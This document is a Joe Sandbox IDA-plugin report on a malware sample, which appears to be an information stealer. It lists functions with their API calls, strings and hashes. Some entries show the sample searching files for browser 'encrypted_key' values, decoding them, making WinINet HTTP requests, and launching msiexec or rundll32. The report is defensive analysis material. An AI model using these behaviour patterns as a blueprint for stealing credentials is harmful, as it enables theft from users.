Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 36a131014ac35b7792bc713dc5d5df827f751ca62af8cb60c663e086c67498b7
Instruction ID: f1d7318c66ac60364ae5bde02bbcb369a01d0a98d0c25197fcae663fbb705c06
Opcode Fuzzy Hash: 36a131014ac35b7792bc713dc5d5df827f751ca62af8cb60c663e086c67498b7
Instruction Fuzzy Hash: 9112CA71810108AACF19FBA0DC92FDEB778AF65300F844169F506661A1EF752B4DDBE2

Function 6C6BEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BEC8C

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

GetCurrentThreadId.KERNEL32 ref: 6C6BECA1
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C6BECC5
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C6BED19
CloseHandle.KERNEL32(?), ref: 6C6BED28
free.MOZGLUE(00000000), ref: 6C6BED2F
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C6BEC94

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: ab7415e4a7914e6b213dec57f245486f181706a12ff6cb5641864c1ba795b269
Instruction ID: 1bdfff479c2b94a31c78ff3949a31b2b577b55a9b81634e7a55976a94e85e2c3
Opcode Fuzzy Hash: ab7415e4a7914e6b213dec57f245486f181706a12ff6cb5641864c1ba795b269
Instruction Fuzzy Hash: 0521E7756001049BDB009F25E844A9E77BBFF8636CF104211FD34A7742DB719826CBAE

Function 6C69C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C69C5A3
WideCharToMultiByte.KERNEL32 ref: 6C69C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C69C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C69CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C69CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C69CAA5

Strings

0, xrefs: 6C69D30A
(null), xrefs: 6C69C596

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: b389a3ea5074eb894e0287f30ba3a7621743bc8a20465c018d236236b6b00bd6
Instruction ID: 434a3e9ab528402c4df252e1732b94a4ced101788b346b2e48b19ab73f01d309
Opcode Fuzzy Hash: b389a3ea5074eb894e0287f30ba3a7621743bc8a20465c018d236236b6b00bd6
Instruction Fuzzy Hash: 5DA1AF30609342AFDB00DF28C59475ABBF1BFCA758F04892DE99AD7641D731D809CB9A

Function 00198AB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00198BD6

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: 4502801822a3d689874509ae34edb2f6c35c684e43dba6c52a903c3d03d6ff0f
Instruction ID: 8e0e67d386c253625b1430f38b0605ba8efd6f0fda2e2b0821b297b91573a81c
Opcode Fuzzy Hash: 4502801822a3d689874509ae34edb2f6c35c684e43dba6c52a903c3d03d6ff0f
Instruction Fuzzy Hash: F371B9B5A10208ABDB14EFE4DC89FEEB7BDBF49700F108508F516A7294DB74A905CB60

Function 00194DA0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 001862D0: InternetOpenA.WININET(001A0DE6,00000001,00000000,00000000,00000000), ref: 00186331
Part of subcall function 001862D0: StrCmpCA.SHLWAPI(?,013AE450), ref: 00186353
Part of subcall function 001862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
Part of subcall function 001862D0: HttpOpenRequestA.WININET(00000000,GET,?,013ADA48,00000000,00000000,00400100,00000000), ref: 001863D5
Part of subcall function 001862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
Part of subcall function 001862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00194DF8
lstrlen.KERNEL32(00000000), ref: 00194E0F

Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2

StrStrA.SHLWAPI(00000000,00000000), ref: 00194E44
lstrlen.KERNEL32(00000000), ref: 00194E63
lstrlen.KERNEL32(00000000), ref: 00194E8E

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Strings

ERROR, xrefs: 00194DEA
ERROR, xrefs: 00194E99
ERROR, xrefs: 00194F4F
ERROR, xrefs: 00194F12
ERROR, xrefs: 00194F89

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 9d13502aadeb4bfa6c908d0a910fe76eb6c8eb896f43c06a87d234c6e53741ad
Instruction ID: 7a1c00b0b3834a244f2ee31e7a5653ac1d4d9812703953a5cfc0a4ec547c7fa1
Opcode Fuzzy Hash: 9d13502aadeb4bfa6c908d0a910fe76eb6c8eb896f43c06a87d234c6e53741ad
Instruction Fuzzy Hash: 8451DB30910109ABCF18FF64C996EED7779AF61340F904028F80A975A1EF706B49DBE2

Function 6C673480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C673492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6734A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6734EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C67350E
__Init_thread_footer.LIBCMT ref: 6C673522
__aulldiv.LIBCMT ref: 6C673552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C67357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C673592

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

Strings

kernel32.dll, xrefs: 6C6734EA
GetSystemTimePreciseAsFileTime, xrefs: 6C673508

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 49453486a03f4ad9996ee341fe91d26b7e35a79b6d9d0863155eb3c06ad1349e
Instruction ID: 2488d7147dee6887a24afec908c832bb8de6957349e2c51b368252636db98b63
Opcode Fuzzy Hash: 49453486a03f4ad9996ee341fe91d26b7e35a79b6d9d0863155eb3c06ad1349e
Instruction Fuzzy Hash: D131C471B002059BEF10DFBAD888AAE77B6FB86305F104429E521D3650DB709905CF6D

Function 6C674480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C6B4843,?), ref: 6C6745F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C6B4843,?), ref: 6C67468A
free.MOZGLUE(?,?,?,?,?,?,6C6B4843,?), ref: 6C6746C9
free.MOZGLUE(?), ref: 6C6746EF
free.MOZGLUE(?), ref: 6C674712
free.MOZGLUE(?), ref: 6C674735
free.MOZGLUE(?), ref: 6C674758
free.MOZGLUE(?), ref: 6C67477B
free.MOZGLUE(?), ref: 6C67479E

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: ee0e33c04e8b25b9e08f3a646fadee3ec7561237bf7532796415c1129a56edb5
Instruction ID: 7bc274157699efeb10a18dd4c2741e8735febf43f56e1433a5a0004ee595cc30
Opcode Fuzzy Hash: ee0e33c04e8b25b9e08f3a646fadee3ec7561237bf7532796415c1129a56edb5
Instruction Fuzzy Hash: 4AB10671A001148FDB28CF3CD8E87BD77A5AF46328F180A29E416DBB86D775D8408F69

Function 00190DE0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: f9e13b1b09ff035d5982b9bfc235c4f807a715a69ca03e8c04718a382f056645
Instruction ID: 9bf7d9033f9d3d496e860ee0dfa101690af1d63d3034b383394b5daf77d73ddd
Opcode Fuzzy Hash: f9e13b1b09ff035d5982b9bfc235c4f807a715a69ca03e8c04718a382f056645
Instruction Fuzzy Hash: 82C1A4B5900119ABCF18EF60DC99FDA7378BF64304F404598F40AA7241EB70AA85CFE1

Function 00193D90 Relevance: 16.7, APIs: 11, Instructions: 195stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB

lstrcat.KERNEL32(?,00000000), ref: 00193DFC
lstrcat.KERNEL32(?,013ADF40), ref: 00193E1B
lstrcat.KERNEL32(?,?), ref: 00193E2F
lstrcat.KERNEL32(?,013ACD50), ref: 00193E43

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 00198830: GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A554C,?,?,001A0E07), ref: 0019883F

Part of subcall function 00189D30: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00189D89

Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA

Part of subcall function 00198E60: GlobalAlloc.KERNEL32(00000000,00193EED,00193EED), ref: 00198E73

StrStrA.SHLWAPI(?,013ADFA0), ref: 00193F03
GlobalFree.KERNEL32(?), ref: 00193FFF

Part of subcall function 00189B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B3F
Part of subcall function 00189B10: LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 00189B51
Part of subcall function 00189B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B7A
Part of subcall function 00189B10: LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 00189B8F

Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE

lstrcat.KERNEL32(?,00000000), ref: 00193F90
StrCmpCA.SHLWAPI(?,001A089B,?,?,?,?,000003E8), ref: 00193FAD
lstrcat.KERNEL32(00000000,00000000), ref: 00193FBF
lstrcat.KERNEL32(00000000,?), ref: 00193FD2
lstrcat.KERNEL32(00000000,001A0F88), ref: 00193FE1

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$Local$AllocFile$Free$BinaryCryptGlobalString$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 1899081627-0
Opcode ID: a4582ff8f53a92f63aa5da5f80fb7559f26c587a255e532d94ace1b10fd6a67f
Instruction ID: 3a1853a8d831c5356dbb769d61d932bfaef987866b83d06e595fdd074d38a74d
Opcode Fuzzy Hash: a4582ff8f53a92f63aa5da5f80fb7559f26c587a255e532d94ace1b10fd6a67f
Instruction Fuzzy Hash: 277153B6910108ABCF14EBA0DC85FDE777DAF59300F448598F606A7181EB749B48CFA1

Function 6C6DAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6DAC52
CreateFileMappingW.KERNEL32 ref: 6C6DAC7D
GetSystemInfo.KERNEL32 ref: 6C6DAC98
MapViewOfFile.KERNEL32 ref: 6C6DACB0
GetSystemInfo.KERNEL32 ref: 6C6DACCD
MapViewOfFile.KERNEL32 ref: 6C6DAD05
UnmapViewOfFile.KERNEL32 ref: 6C6DAD1C
CloseHandle.KERNEL32 ref: 6C6DAD28
UnmapViewOfFile.KERNEL32 ref: 6C6DAD37
CloseHandle.KERNEL32 ref: 6C6DAD43
CloseHandle.KERNEL32 ref: 6C6DAD67

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
